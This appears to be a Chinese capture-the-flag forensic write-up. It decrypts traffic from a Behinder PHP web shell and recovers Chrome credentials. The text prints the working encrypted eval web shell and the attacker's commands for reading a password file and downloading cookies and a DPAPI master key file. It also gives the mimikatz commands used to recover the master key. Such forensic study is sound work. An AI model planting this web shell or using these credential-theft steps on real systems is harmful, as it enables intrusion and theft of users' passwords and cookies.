先是shell脚本
- <?php
- @error_reporting(0);
- session_start();
- if (isset($_GET['pass']))
- {
- $key=substr(md5(uniqid(rand())),16);
- $_SESSION['k']=$key;
- print $key;
- }
- else
- {
- $key=$_SESSION['k'];
- $post=file_get_contents("php://input");
- if(!extension_loaded('openssl'))
- {
- $t="base64_"."decode";
- $post=$t($post."");
- for($i=0;$i<strlen($post);$i++) {
- $post[$i] = $post[$i]^$key[$i+1&15];
- }
- }
- else
- {
- $post=openssl_decrypt($post, "AES128", $key);
- }
- $arr=explode('|',$post);
- $func=$arr[0];
- $params=$arr[1];
- class C{public function __construct($p) {eval($p."");}}
- @new C($params);
- }
- ?>
冰蝎,利用的是动态二进制加密,大致意思是:
因此解密攻击者POST的内容需要尝试异或和AES解密。
- <?php
- {
- $key = 'd59042be6e437849';
- $post = 'DzqZ3o6...内容太长此处省略';
- $t="base64_"."decode";
- $post=$t($post."");
- for($i=0;$i<strlen($post);$i++) {
- $post[$i] = $post[$i]^$key[$i+1&15]; }
- print $post;
- }
- ?>
AES解密网站 http://tools.bugscaner.com/cryptoaes/
这里就是密钥和加密的内容
解密成功,可以看到是base64,恢复成php
- @error_reporting(0);
- function main($content)
- {
- $result = array();
- $result["status"] = base64_encode("success");
- $result["msg"] = base64_encode($content);
- $key = $_SESSION['k'];
- echo encrypt(json_encode($result),$key);
- }
- function encrypt($data,$key)
- {
- if(!extension_loaded('openssl'))
- {
- for($i=0;$i<strlen($data);$i++) {
- $data[$i] = $data[$i]^$key[$i+1&15];
- }
- return $data;
- }
- else
- {
- return openssl_encrypt($data, "AES128", $key);
- }
- }$content="f5dfe44a-0213-45db-a617-8db5e5a07ab3";
- main($content);
将十九次攻击内容按照同样的方法恢复出来:
- $content="f5dfe44a-0213-45db-a617-8db5e5a07ab3";
- $mode="list";$path="C:/";
- $mode="list";$path="C:/Users/";
- $mode="list";$path="C:/Users/shadow/";
- $mode="list";$path="C:/Users/shadow/Desktop/";
- $mode="show";$path="C:/Users/shadow/Desktop/password.txt";$content="";
- $mode="list";$path="C:/Users/shadow/AppData/";
- $mode="list";$path="C:/Users/shadow/AppData/Local/";
- $mode="list";$path="C:/Users/shadow/AppData/Local/Google/";
- $mode="list";$path="C:/Users/shadow/AppData/Local/Google/Chrome/";
- $mode="list";$path="C:/Users/shadow/AppData/Local/Google/Chrome/User Data/";
- $mode="list";$path="C:/Users/shadow/AppData/Local/Google/Chrome/User Data/Default/";
- $mode="download";$path="C:/Users/shadow/AppData/Local/Google/Chrome/User Data/Default/Cookies";
- $mode="list";$path="C:/Users/shadow/AppData/";
- $mode="list";$path="C:/Users/shadow/AppData/Roaming/";
- $mode="list";$path="C:/Users/shadow/AppData/Roaming/Microsoft/";
- $mode="list";$path="C:/Users/shadow/AppData/Roaming/Microsoft/Protect/";
- $mode="list";$path="C:/Users/shadow/AppData/Roaming/Microsoft/Protect/S-1-5-21-2127750816-4215895028-2373289296-1001/";
- $mode="download";$path="C:/Users/shadow/AppData/Roaming/Microsoft/Protect/S-1-5-21-2127750816-4215895028-2373289296-1001/6ecf76bd-1803-437e-92e6-28dd36c907aa";
攻击者执行了很多列目录的操作,看了下password.txt文件(内容解密后是p@ssw0rd)并下载了两个文件:谷歌浏览器的cookies和用户的Master Key file。
题目的意思大概是要我们导出谷歌浏览器中保存的密码。这就涉及到了DPAPI(Data Protection API),是用来加密数据的接口,比如Chrome的Cookies。DPAPI使用了Master Key这个东西来加解密。而Master Key是通过用户的密码HASH来加密生成的。其中Master Key用Masterkey File得到,也就是上面第二次下载的文件。
C:\Users\<USER>\AppData\Roaming\Microsoft\Protect\<SID>\<GUID>
<SID>是用户的安全描述符,<GUID>是Master Key的名字。
使用mimikatz
已知用户登录密码password,用户SID,GUID,那就可以解出MasterKey
将下载的第二个文件导出成十六进制
然后使用mimikatz导出MasterKey
- dpapi::masterkey /in:"C:\Users\during\Desktop\6ecf76bd-1803-437e-92e6-28dd36c907aa" /sid:S-1-5-21-2127750816-4215895028-2373289296-1001 /password:p@ssw0rd /protecte
- [masterkey] with password: p@ssw0rd (protected user)
- key : dc273990f4a61dde19f7708be532a9ed08e9e0d21581fb29c6d3ddcfbccad5a4dfe09b9fdfe54c78841dead69035c89f3ab577522b58b9d7c5740fcdb8095c1a
- sha1: 620059f8573ebe9113fa5eaed72d8fef45469ea
同样的方法使用masterkey导出chrome的cookie,是SQLite文件,改后缀为db
--By Wander